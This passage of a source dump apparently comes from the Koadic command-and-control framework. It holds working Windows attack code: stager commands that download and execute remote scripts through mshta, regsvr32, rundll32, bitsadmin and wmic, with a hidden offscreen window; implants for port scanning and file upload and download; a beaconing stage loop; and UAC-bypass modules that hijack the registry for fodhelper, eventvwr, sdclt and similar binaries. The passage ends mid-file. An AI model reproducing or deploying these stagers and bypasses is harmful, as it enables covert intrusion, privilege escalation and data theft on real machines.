| 90 | Koadic.exit(); 91 | -------------------------------------------------------------------------------- /data/implant/scan/tcp.vbs: -------------------------------------------------------------------------------- 1 | dim kotimeout 2 | kotimeout = ~TIMEOUT~ 3 | 4 | function TestPortWscript(url) 5 | on error resume next 6 | Set x = createobject("Microsoft.XMLHTTP") 7 | x.open "GET", url, true 8 | x.send 9 | 'MsgBox url 10 | KoSleep kotimeout 11 | 12 | status = x.status 13 | if err.number = -2147467259 then 14 | TestPortWscript = "open" 15 | exit function 16 | end if 17 | 18 | if x.status < 1000 or x.status = 12031 then 19 | TestPortWscript = "open" 20 | exit function 21 | end if 22 | if status = 12029 then 23 | TestPortWscript = "closed" 24 | exit function 25 | end if 26 | if x.status = 12005 then 27 | TestPortWscript = "unsupported" 28 | exit function 29 | end if 30 | 31 | TestPortWscript = "unknown" 32 | end function 33 | 34 | function TestPortMSHTA(url) 35 | { 36 | var ABNORMAL_TERMINATION = -2147012866 37 | var UNSUPPORTED_PORT = -2147012795 38 | var CONNECTION_ERROR = -2147012867 39 | var WRONG_PROTOCOL = -2147012744 40 | var OPERATION_CANCELED = -2147012879 41 | 42 | try 43 | { 44 | var objHTTP = new ActiveXObject("WinHttp.WinHttpRequest.5.1") 45 | objHTTP.Open("GET", url, True) 46 | objHTTP.Send(); 47 | objHTTP.WaitForResponse(~TIMEOUT~) 48 | 49 | return "open"; 50 | } 51 | catch(err) 52 | { 53 | if (err.number == UNSUPPORTED_PORT) 54 | return "unsupported"; 55 | 56 | if (err.number == CONNECTION_ERROR) 57 | return "closed"; 58 | 59 | if (err.number == WRONG_PROTOCOL || err.number == ABNORMAL_TERMINATION || err.number == OPERATION_CANCELED) 60 | return "open"; 61 | } 62 | 63 | return "unknown"; 64 | } 65 | 66 | function TestPort(ip, port) 67 | { 68 | var url = "http://" + ip + ":" + port; 69 | if (Koadic.isHTA()) 70 | return TestPortMSHTA(url) 71 | else 72 | TestPort = TestPortWscript(url) 73 | end if 74 | } 75 | end function 76 | 77 | 78 | ~RHOSTS~ 79 | 80 | ~RPORTS~ 81 | 82 | 83 | for each ip in ips 84 | ' ghetto check if the IP is up 85 | if TestPort(ip, 0) = "closed" then 86 | for each port in ports 87 | data = TestPort(ip, port) 88 | errno = hex(err.number) 89 | data = data & vbcrlf & ip & vbcrlf & port & vbcrlf & errno 90 | KoReportWork data 91 | next 92 | else 93 | errno = hex(err.number) 94 | KoReportWork "not up" & vbcrlf & ip & vbcrlf & "0" & vbcrlf & "-1" 95 | end if 96 | next 97 | 98 | KoReportWork "done" 99 | 100 | KoExit 101 | -------------------------------------------------------------------------------- /data/implant/util/download_file.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | Koadic.http.upload("~RFILEF~", "data", ~CERTUTIL~); 4 | } 5 | catch (e) 6 | { 7 | Koadic.work.error(e); 8 | } 9 | 10 | Koadic.exit(); 11 | -------------------------------------------------------------------------------- /data/implant/util/download_file.vbs: -------------------------------------------------------------------------------- 1 | Function WinHTTPPostRequest(URL, FormData, Boundary) 2 | Dim http 'As New MSXML2.XMLHTTP 3 | 4 | 'Create XMLHTTP/ServerXMLHTTP/WinHttprequest object 5 | 'You can use any of these three objects. 6 | Set http = CreateObject("WinHttp.WinHttprequest.5.1") 7 | 'Set http = CreateObject("MSXML2.XMLHTTP") 8 | 'Set http = CreateObject("MSXML2.ServerXMLHTTP") 9 | 10 | 'Open URL As POST request 11 | http.Open "POST", URL, False 12 | 13 | 'Set Content-Type header 14 | http.setRequestHeader "Content-Type", "multipart/form-data; boundary=" + Boundary 15 | 16 | 'Send the form data To URL As POST binary request 17 | 18 | MsgBox Len(formdata) 19 | http.send FormData 20 | 21 | 'Get a result of the script which has received upload 22 | WinHTTPPostRequest = http.responseText 23 | End Function 24 | 25 | path = KoGetPath("~RFILE~") 26 | data = KoReadBinaryFile(path) 27 | 28 | MsgBox len(data) 29 | data = Replace(data, chr(92), "\\", 1, -1, 0) 30 | data = Replace(data, chr(0), "\0", 1, -1, 0) 31 | MsgBox len(data) 32 | 33 | KoReportWork data 34 | KoExit 35 | -------------------------------------------------------------------------------- /data/implant/util/upload_file.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var headers = {}; 4 | headers["X-UploadFileJob"] = "true"; 5 | var path = Koadic.file.getPath( "~DIRECTORY~\\~FILE~"); 6 | 7 | Koadic.http.downloadEx("POST", Koadic.work.make_url(), headers, path); 8 | Koadic.work.report("Completed"); 9 | } 10 | catch (e) 11 | { 12 | Koadic.work.error(e); 13 | } 14 | 15 | Koadic.exit(); 16 | -------------------------------------------------------------------------------- /data/implant/util/upload_file.vbs: -------------------------------------------------------------------------------- 1 | path = KoGetPath("~DIRECTORY~\~FILE~") 2 | 3 | dim headers(1) 4 | headers(0) = "X-UploadFileJob" 5 | headers(1) = "true" 6 | 7 | set http = KoReportWorkEx("", headers) 8 | 9 | ' Default IE policy does not allow this in MSHTA sessions 10 | 'dim bStrm: Set bStrm = createobject("Adodb.Stream") 11 | 12 | 'with bStrm 13 | '' .type = 1 '//binary 14 | '' .open 15 | '' .write http.responseBody 16 | '' .savetofile path, 2 '//overwrite 17 | 'end with 18 | 19 | ' we have to solve Shlemiel the Painter problem 20 | ' so we carry the bucket with us for every pagesize 21 | dim j, roadlen, pagesize, pagecount, fd, timeouthandle 22 | j = 1 23 | roadlen = LenB(http.responseBody) 24 | pagesize = 2000 25 | pagecount = roadlen \ pagesize 26 | 27 | set fd = kofs.OpenTextFile(path, 2, True, 0) 28 | 29 | sub CopyBytesWithTimeOut 30 | on error resume next 31 | 'for j = 1 to pagecount 32 | 'if roadlen <= FinishUp 33 | if j = pagecount + 1 then 34 | FinishUp 35 | else 36 | data = "" 37 | roadsection = MidB(http.responseBody, (j-1)*pagesize+1, pagesize) 38 | for i = 1 to LenB(roadsection) 39 | data = data & Chr( AscB( MidB( roadsection, i, 1 ) ) ) 40 | next 41 | fd.write data 42 | j = j + 1 43 | if isobject(window) then 44 | timeouthandle = window.setTimeout(GetRef("CopyBytesWithTimeOut"), 0)', "VBScript") 45 | else 46 | CopyBytesWithTimeOut 47 | end if 48 | end if 49 | 'next 50 | end sub 51 | 52 | sub FinishUp 53 | on error resume next 54 | data = "" 55 | 56 | startIndex = pagecount * pagesize 57 | if startIndex = 0 then 58 | startIndex = 1 59 | end if 60 | 61 | ' write the remaining page 62 | remainder = MidB(http.responseBody, startIndex, roadlen - pagecount*pagesize) 63 | for i = 1 to LenB(remainder) 64 | data = data & Chr( AscB( MidB( remainder, i, 1 ) ) ) 65 | next 66 | 67 | fd.write data 68 | fd.close() 69 | 70 | KoReportWork "" 71 | KoExit 72 | 73 | end sub 74 | 75 | CopyBytesWithTimeOut 76 | -------------------------------------------------------------------------------- /data/pabst.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[31;1m00000000000000\033[0m \033[34;1m.`.`.`.`.\033[0m 3 | \033[31;1m00000000000000\033[0m \033[34;1m./sssyy/+h+yysss-\033[0m 4 | \033[31;1m00000000000000\033[0m\033[34;1m`shsy.`-/+ooo+ooo+//.`-ysdo\033[0m 5 | \033[0m\033[31;1m00000000\033[0m\033[34;1m-yyy: .++y`. ``-+soo``+yys.\033[0m 6 | \033[0m\033[31;1m0000\033[0m\033[34;1m`hh.`:/y: `/s+:`-ds`\033[0m 7 | \033[34;1m-yh-./y. -h-.:ds.\033[0m 8 | \033[34;1mhh``/h. \033[37m_______ ___ _______\033[0m \033[34;1m-h-`.ds\033[0m 9 | \033[34;1m/d+--h: \033[37m| . | \\| .\\| _|_ _\\\033[0m \033[34;1m+s--sd-\033[0m 10 | \033[34;1m`` `sm../y \033[37m| __| . | .<[__ \\||\033[0m \033[34;1m`d-.:m+\033[0m 11 | \033[34;1m.soooooso``// \033[37m___ _ |/ |/\\_|___|___/|/\033[0m \033[34;1mo:`.soooooo+`\033[0m 12 | \033[34;1ms+ \033[37m| . | |_ _ ___ | . <_| |_| |_ ___._ _\033[0m \033[34;1md-\033[0m 13 | \033[34;1ms+ \033[37m| . | | | / ._> | | | . | . / . | ' |\033[0m \033[34;1md-\033[0m 14 | \033[34;1ms+ \033[37m|___|_`___\\___. |_\\_|_|___|___\\___|_|_|\033[0m \033[34;1md-\033[0m 15 | \033[34;1mos./++++:.:/:-.+/: +-+-+-+-+ ::.-://:-//:-+/..d.\033[0m 16 | \033[34;1m`/++++++++sh/--:s:` |\033[37mB\033[0m\033[34;1m|\033[37mE\033[0m\033[34;1m|\033[37mE\033[0m\033[34;1m|\033[37mR\033[0m\033[34;1m| \033[34;1m`/s---+h+++++++++:\033[0m 17 | \033[34;1m`-hy../+s:` +-+-+-+-+ ./s+:.-ds. \033[0m 18 | \033[34;1m.oyh-`:+o+:.` `.:oo+-`/hs+`\033[0m 19 | \033[34;1m.dhso``/:oo+/-........-:/+o+/:`.yshm` \033[0m 20 | \033[34;1mod` .++oy++s-.s-.//.:s/+y++/` od`\033[0m\033[31;1m0\033[0m 21 | \033[34;1m.d+ `-.-++:sdo:+/..-` .m+\033[0m\033[31;1m000\033[0m 22 | \033[34;1mod` om: od`\033[0m\033[31;1m0000\033[0m 23 | \033[34;1m+d` /m/m- +d.\033[0m\033[31;1m00000\033[0m 24 | \033[34;1m`hs```````` yy `d+ ````..-:do \033[0m\033[31;1m00000\033[0m 25 | \033[34;1m.osssyyyyyys/. -m- od` `-+syysso+/::-\033[0m\033[31;1m00000000\033[0m 26 | \033[34;1m-+yy+-`sy .m/`./shs/.\033[0m \033[31;1m00000000000000\033[0m 27 | \033[34;1m`:shm: sdhs/.\033[0m \033[31;1m00000000000000\033[0m 28 | \033[34;1m`-` .-`\033[0m \033[31;1m00000000000000\033[0m 29 | -------------------------------------------------------------------------------- /data/shamrock.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[32;32m `-.\033[0m 3 | \033[33;32m -` `-/osoooss:`-``\033[0m 4 | \033[33;32m ` .`+ssso+++os++//-```.`. --`\033[0m 5 | \033[33;32m .-:+oosy+` `/sssoo+++oy`:+.\033[0m 6 | \033[33;32m `-+o+ooo++/ /yyyhysyhyoo+o.\033[0m 7 | \033[33;32m `:/sys:.` `` `yyhhhsoooyhys++-\033[0m 8 | \033[33;32m `.`+hh: `hhs:` .o+/:.`.\033[0m 9 | \033[33;32m +hhh. -y: `y++o.\033[0m 10 | \033[33;32m -hhhhs. -` -sssy-`\033[0m 11 | \033[33;32m `/oyyys+:. -syyyyo`\033[0m 12 | \033[33;32m ``+ssyhhyo+:-`` `+hhhh:\033[0m 13 | \033[33;32m ```/++os:` `` shhhy.\033[0m 14 | \033[33;32m .:/o+` :.:-` .hhhhs:\033[0m 15 | \033[33;32m `./s+ /+--os/-` `.+yhhh+.-`\033[0m 16 | \033[33;32m `.++s: +hho.-shhhhhdysyyo:.`\033[0m 17 | \033[33;32m ` `:`:yhyso+- `shhys+`./syyo+:-`.``\033[0m 18 | \033[33;32m ` .shdddho ohhhsshho. `-:o+. ` `\033[0m 19 | \033[33;32m ``ohdhhh/` .:oyyyyssyyhy+-`-y` `\033[0m 20 | \033[33;32m ./+shhyyssyhhhy+.+::``+hyss/:` `\033[0m 21 | \033[33;32m `..:///++/+ssyhh/ ` `\033[0m 22 | \033[33;32m .` ``` `---` :+`\033[0m 23 | \033[33;32m `\033[0m 24 | -------------------------------------------------------------------------------- /data/stager/js/bitsadmin/bitsadmin.cmd: -------------------------------------------------------------------------------- 1 | bitsadmin /transfer ~ENDPOINT~ /download /priority high ~URL~ %temp%\~FENDPOINT~ & start /wait %temp%\~FENDPOINT~ & del %temp%\~FENDPOINT~ -------------------------------------------------------------------------------- /data/stager/js/bitsadmin/template.wsf: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | -------------------------------------------------------------------------------- /data/stager/js/disk/disk.cmd: -------------------------------------------------------------------------------- 1 | echo try{x=new ActiveXObject('Microsoft.XMLHTTP');x.open('GET','~URL~',false);x.send();eval(x.responseText)}catch(e){}>~DIRECTORY~/~SCRIPT~&start wscript ~DIRECTORY~/~SCRIPT~ 2 | -------------------------------------------------------------------------------- /data/stager/js/mshta/mshta.cmd: -------------------------------------------------------------------------------- 1 | mshta ~URL~ 2 | -------------------------------------------------------------------------------- /data/stager/js/mshta/template.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 17 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /data/stager/js/mshtajs/mshtajs.cmd: -------------------------------------------------------------------------------- 1 | mshta javascript:eval("x=new ActiveXObject('WinHttp.WinHttpRequest.5.1');x.open('GET','~URL~~DLLJSPATH~~SESSIONPATH~',false);x.send();eval(x.responseText)")(window.close()) 2 | -------------------------------------------------------------------------------- /data/stager/js/regsvr/regsvr.cmd: -------------------------------------------------------------------------------- 1 | regsvr32 /s /u /n /i:~URL~ scrobj 2 | -------------------------------------------------------------------------------- /data/stager/js/regsvr/template.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /data/stager/js/rundll32/rundll32.cmd: -------------------------------------------------------------------------------- 1 | rundll32.exe ~URL~\..\..\..\./mshtml,RunHTMLApplication 2 | -------------------------------------------------------------------------------- /data/stager/js/rundll32_js/rundll32_js.cmd: -------------------------------------------------------------------------------- 1 | rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","~URL~",false);x.send();eval(x.responseText);window.close(); 2 | -------------------------------------------------------------------------------- /data/stager/js/stage.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | if (Koadic.JOBKEY != "stage") 4 | { 5 | if (Koadic.isHTA()) 6 | { 7 | //HKCU\SOFTWARE\Microsoft\Internet Explorer\Style\MaxScriptStatements = 0xFFFFFFFF 8 | var path = "SOFTWARE\\Microsoft\\Internet Explorer\\Styles"; 9 | var key = "MaxScriptStatements"; 10 | Koadic.registry.write(Koadic.registry.HKCU, path, key, 0xFFFFFFFF, Koadic.registry.DWORD); 11 | } 12 | 13 | Koadic.work.report(Koadic.user.info()); 14 | 15 | try { 16 | Koadic.work.fork(""); 17 | } catch (e) { 18 | Koadic.work.error(e) 19 | } 20 | Koadic.exit(); 21 | } 22 | else 23 | { 24 | if (Koadic.isHTA()) 25 | DoWorkTimeout(); 26 | else 27 | DoWorkLoop(); 28 | } 29 | } 30 | catch (e) 31 | { 32 | // todo: critical error reporting 33 | Koadic.work.error(e); 34 | } 35 | 36 | function DoWork() 37 | { 38 | 39 | var epoch = new Date().getTime(); 40 | var expire = parseInt(Koadic.EXPIRE); 41 | if (epoch > expire) 42 | { 43 | return false; 44 | } 45 | 46 | try 47 | { 48 | var work = Koadic.work.get(); 49 | // 201 = x64 or x86 50 | // 202 = force x86 51 | if (work.status == 201 || work.status == 202) 52 | { 53 | if (work.responseText.length > 0) { 54 | var jobkey = work.responseText; 55 | Koadic.work.fork(jobkey, work.status == 202); 56 | } 57 | } 58 | else // if (work.status == 500) // kill code 59 | { 60 | return false; 61 | } 62 | } 63 | catch (e) 64 | { 65 | return false; 66 | } 67 | 68 | return true; 69 | } 70 | 71 | function DoWorkLoop() 72 | { 73 | while (DoWork()) 74 | ; 75 | 76 | Koadic.exit(); 77 | } 78 | 79 | function DoWorkTimeout() 80 | { 81 | for (var i = 0; i < 10; ++i) 82 | { 83 | if (!DoWork()) 84 | { 85 | Koadic.exit(); 86 | return; 87 | } 88 | } 89 | //window.setTimeout(DoWorkTimeoutCallback, 0); 90 | 91 | Koadic.work.fork(""); 92 | Koadic.exit(); 93 | } 94 | -------------------------------------------------------------------------------- /data/stager/js/wmic/template.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 11 | 12 | -------------------------------------------------------------------------------- /data/stager/js/wmic/wmic.cmd: -------------------------------------------------------------------------------- 1 | wmic os get /FORMAT:"~URL~" 2 | -------------------------------------------------------------------------------- /data/stager/vbscript/disk.cmd: -------------------------------------------------------------------------------- 1 | echo on error resume next:Set x=CreateObject("Microsoft.XMLHTTP"):x.open"GET","~URL~",false:x.send:Execute x.responseText>~DIRECTORY~/~FILE~.vbs&start wscript ~DIRECTORY~/~FILE~.vbs 2 | -------------------------------------------------------------------------------- /data/stager/vbscript/mshta.cmd: -------------------------------------------------------------------------------- 1 | mshta vbscript:Execute("on error resume next:Set x=CreateObject(""WinHttp.WinHttpRequest.5.1""):x.open""GET"",""~URL~"",false:x.send:Execute x.responseText")(window.close) 2 | -------------------------------------------------------------------------------- /data/stager/vbscript/work.vbs: -------------------------------------------------------------------------------- 1 | Sub ForkWorkMSHTA(jobkey) 2 | cmd = "mshta vbscript:Execute(""window.blur:window.moveTo -2000,-2000:on error resume next:Set x=CreateObject(""""WinHttp.WinHttpRequest.5.1""""):" 3 | cmd = cmd & "x.open""""POST"""",""""" & jobpath & """"",false:" 4 | cmd = cmd & "x.setRequestHeader""""sessionkey"""",""""" & sessionkey & """"":" 5 | cmd = cmd & "x.setRequestHeader""""jobkey"""",""""" & jobkey & """"":" 6 | cmd = cmd & "x.send:Execute x.responseText"")(window.close)" 7 | 8 | 9 | 'kows.Run cmd, 0, false 10 | KoExecWMI cmd 11 | End Sub 12 | 13 | Sub ForkWorkWscript(jobkey) 14 | path = KoGetPath("~DIRECTORY~/~FILE~1.vbs") 15 | 16 | data = "on error resume next:Set x=CreateObject(""Microsoft.XMLHTTP""):x.open""POST"",""" & jobpath & """,false:" 17 | data = data & "x.setRequestHeader""sessionkey"",""" & sessionkey & """:" 18 | data = data & "x.setRequestHeader""jobkey"",""" & jobkey & """:" 19 | data = data & "x.send:Execute x.responseText" 20 | 21 | KoWriteFile path, data 22 | 23 | cmd = "cmd /q /c start wscript " & path 24 | kows.Run cmd, 0, false 25 | end Sub 26 | 27 | Sub ForkWork(jobkey) 28 | if isobject(Wscript) then 29 | ForkWorkWscript jobkey 30 | else 31 | ForkWorkMSHTA jobkey 32 | end if 33 | end sub 34 | 35 | Sub DoWork 36 | on error resume next 37 | set work = KoGetWork() 38 | if err.number = 0 then 39 | if work.status = 201 then 40 | jobkey = work.responseText 41 | ForkWork jobkey 42 | end if 43 | else 44 | KoSleep 10 45 | end if 46 | End Sub 47 | 48 | Sub DoWorkTimeOut 49 | on error resume next 50 | for i = 0 to 2 51 | DoWork 52 | next 53 | ForkWork "stage" 54 | KoSleep 5 55 | KoExit 56 | 57 | 'timeouthandle = window.setTimeout(GetRef("DoWorkTimeOut"), 0)', "VBScript") 58 | end Sub 59 | 60 | Sub DoWorkLoop 61 | on error resume next 62 | do while True 63 | DoWork 64 | Loop 65 | end Sub 66 | 67 | if isobject(window) then 68 | 'window.stop 69 | doworktimeout 70 | else 71 | doworkloop 72 | end if 73 | -------------------------------------------------------------------------------- /data/taco.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[32;1m/oosso:/sys:/yy/:o`\033[0m 3 | \033[32;1m+s\033[0m\033[31;1m/\033[0m\033[32;1mo:oso\033[0m\033[31;1mho\033[0m\033[32;1mdso/:y\033[0m\033[33;1msys//////++:`\033[0m 4 | \033[32;1mhs\033[0m\033[31;1m+-\033[0m\033[32;1m/sss\033[0m\033[31;1m/y\033[0m\033[32;1moo+\033[0m\033[33;1msys:. \033[33;1m./+/`\033[0m 5 | \033[32;1m:dyhyshhossooo\033[0m\033[33;1msss: \033[33;1m.++`\033[0m 6 | \033[32;1moyddhsys\033[0m\033[31;1myh\033[0m\033[32;1myysys\033[0m\033[33;1msyo. \033[33;1m.o:\033[0m 7 | \033[32;1m.osd\033[0m\033[31;1msh\033[0m\033[32;1mmhh\033[0m\033[31;1myy\033[0m\033[32;1mso+\033[0m\033[33;1m+y+` \033[33;1mo/\033[0m 8 | \033[32;1m:y///\033[0m\033[31;1moo\033[0m\033[32;1myyysoys/\033[0m\033[33;1m:o. \033[33;1m++\033[0m 9 | \033[32;1ms++s+-.+:/o+-\033[0m\033[33;1m+y/ \033[33;1ms-\033[0m 10 | \033[33;1m.y\033[0m\033[33;2m+-+`++-o+:/\033[0m\033[33;1m:s- \033[33;1m.h\033[0m 11 | \033[33;1my-\033[0m\033[33;2m-/:-.++-++\033[0m\033[33;1m:y` \033[33;1md\033[0m 12 | \033[33;1md.\033[0m\033[33;2mo:/-`//-:\033[0m\033[33;1moo` \033[33;1m`h\033[0m 13 | \033[33;1mh.\033[0m\033[33;2mo.+++`++\033[0m\033[33;1m/o \033[33;1m.:+.\033[0m 14 | \033[33;1mho\033[0m\033[33;2m:++++.+\033[0m\033[33;1m:o \033[33;1m.-:/+:.\033[0m 15 | \033[33;1mhy\033[0m\033[33;2m`++:+-\033[0m\033[33;1m+s \033[33;1m`.://///:.``\033[0m 16 | \033[33;1m+h\033[0m\033[33;2m+++:+-\033[0m\033[33;1my` \033[33;1m.-://///:-.``\033[0m 17 | \033[33;1m`hy\033[0m\033[33;2m/--/\033[0m\033[33;1ms` \033[33;1m`-//////:.``\033[0m 18 | \033[33;1m.+ooo/:::/://///:.`\033[0m 19 | -------------------------------------------------------------------------------- /data/valentine.txt: -------------------------------------------------------------------------------- 1 | 2 | _______________ _______________ 3 | | ___________ | | ___________ | 4 | | | 0 0 | | | | 0 0 | | 5 | | | - | | \033[31;1m.:::. .:::.\033[0m | | - | | 6 | | | \\___/ | | \033[31;1m:::::::.:::::::\033[0m | | \\___/ | | 7 | | |___________| | \033[31;1m:::::BE:MY:::::\033[0m | |___________| | 8 | |_______________| \033[31;1m':::ZOMBIE?:::'\033[0m |_______________| 9 | _|________|_...........\033[31;1m':::::::::'\033[0m..........._|________|_ 10 | / ********** \\ \033[31;1m':::::'\033[0m / ********** \\ 11 | / ************ \\ \033[31;1m':'\033[0m / ************ \\ 12 | -------------------- -------------------- 13 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_compdefaults.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class CompDefaultsJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if int(self.session.build) < 10240 and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | #self.shell.print_plain(self.data) 22 | 23 | class CompDefaultImplant(core.implant.Implant): 24 | 25 | NAME = "Bypass UAC CompDefaults" 26 | DESCRIPTION = "Bypass UAC via registry hijack for ComputerDefaults.exe. Drops no files to disk." 27 | AUTHORS = ["TheNaterz", "st0rnpentest"] 28 | STATE = "implant/elevate/bypassuac_compdefaults" 29 | 30 | def load(self): 31 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 32 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 33 | 34 | def job(self): 35 | return CompDefaultsJob 36 | 37 | def run(self): 38 | id = self.options.get("PAYLOAD") 39 | payload = self.load_payload(id) 40 | 41 | if payload is None: 42 | self.shell.print_error("Payload %s not found." % id) 43 | return False 44 | 45 | workloads = {} 46 | workloads["js"] = "data/implant/elevate/bypassuac_compdefaults.js" 47 | 48 | self.dispatch(workloads, self.job) 49 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_compmgmtlauncher.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class CompMgmtLauncherJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if (int(self.session.build) < 7600 or int(self.session.build) > 15030) and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | #self.shell.print_plain(self.data) 22 | 23 | class CompMgmtLauncherImplant(core.implant.Implant): 24 | 25 | NAME = "Bypass UAC CompMgmtLauncher" 26 | DESCRIPTION = "Bypass UAC via registry hijack for CompMgmtLauncher.exe. Drops no files to disk." 27 | AUTHORS = ["TheNaterz", "enigma0x3"] 28 | STATE = "implant/elevate/bypassuac_compmgmtlauncher" 29 | 30 | def load(self): 31 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 32 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 33 | 34 | def job(self): 35 | return CompMgmtLauncherJob 36 | 37 | def run(self): 38 | id = self.options.get("PAYLOAD") 39 | payload = self.load_payload(id) 40 | 41 | if payload is None: 42 | self.shell.print_error("Payload %s not found." % id) 43 | return False 44 | 45 | workloads = {} 46 | workloads["js"] = "data/implant/elevate/bypassuac_compmgmtlauncher.js" 47 | 48 | self.dispatch(workloads, self.job) 49 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_eventvwr.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class EventVwrJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if (int(self.session.build) < 7600 or int(self.session.build) > 15030) and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | #self.shell.print_plain(self.data) 22 | 23 | class EventVwrImplant(core.implant.Implant): 24 | 25 | NAME = "Bypass UAC EventVwr" 26 | DESCRIPTION = "Bypass UAC via registry hijack for eventvwr.exe. Drops no files to disk." 27 | AUTHORS = ["zerosum0x0", "@enigma0x3"] 28 | STATE = "implant/elevate/bypassuac_eventvwr" 29 | 30 | def load(self): 31 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 32 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 33 | 34 | def job(self): 35 | return EventVwrJob 36 | 37 | def run(self): 38 | id = self.options.get("PAYLOAD") 39 | payload = self.load_payload(id) 40 | 41 | if payload is None: 42 | self.shell.print_error("Payload %s not found." % id) 43 | return 44 | 45 | workloads = {} 46 | workloads["js"] = "data/implant/elevate/bypassuac_eventvwr.js" 47 | 48 | self.dispatch(workloads, self.job) 49 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_fodhelper.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class FodHelperJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if int(self.session.build) < 10240 and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | #self.shell.print_plain(self.data) 22 | 23 | class FodHelperImplant(core.implant.Implant): 24 | 25 | NAME = "Bypass UAC FodHelper" 26 | DESCRIPTION = "Bypass UAC via registry hijack for fodhelper.exe. Drops no files to disk." 27 | AUTHORS = ["TheNaterz", "winscriptingblog"] 28 | STATE = "implant/elevate/bypassuac_fodhelper" 29 | 30 | def load(self): 31 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 32 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 33 | 34 | def job(self): 35 | return FodHelperJob 36 | 37 | def run(self): 38 | id = self.options.get("PAYLOAD") 39 | payload = self.load_payload(id) 40 | 41 | if payload is None: 42 | self.shell.print_error("Payload %s not found." % id) 43 | return 44 | 45 | workloads = {} 46 | workloads["js"] = "data/implant/elevate/bypassuac_fodhelper.js" 47 | 48 | self.dispatch(workloads, self.job) 49 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_sdclt.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class SDCLTJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if (int(self.session.build) < 10240 or int(self.session.build) > 17024) and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | #self.shell.print_plain(self.data) 22 | 23 | class SDCLTImplant(core.implant.Implant): 24 | 25 | NAME = "Bypass UAC SDCLT" 26 | DESCRIPTION = "Bypass UAC via registry hijack for sdclt.exe. Drops no files to disk." 27 | AUTHORS = ["zerosum0x0", "@enigma0x3"] 28 | STATE = "implant/elevate/bypassuac_sdclt" 29 | 30 | def load(self): 31 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 32 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 33 | 34 | def job(self): 35 | return SDCLTJob 36 | 37 | def run(self): 38 | id = self.options.get("PAYLOAD") 39 | payload = self.load_payload(id) 40 | 41 | if payload is None: 42 | self.shell.print_error("Payload %s not found." % id) 43 | return 44 | 45 | workloads = {} 46 | workloads["js"] = 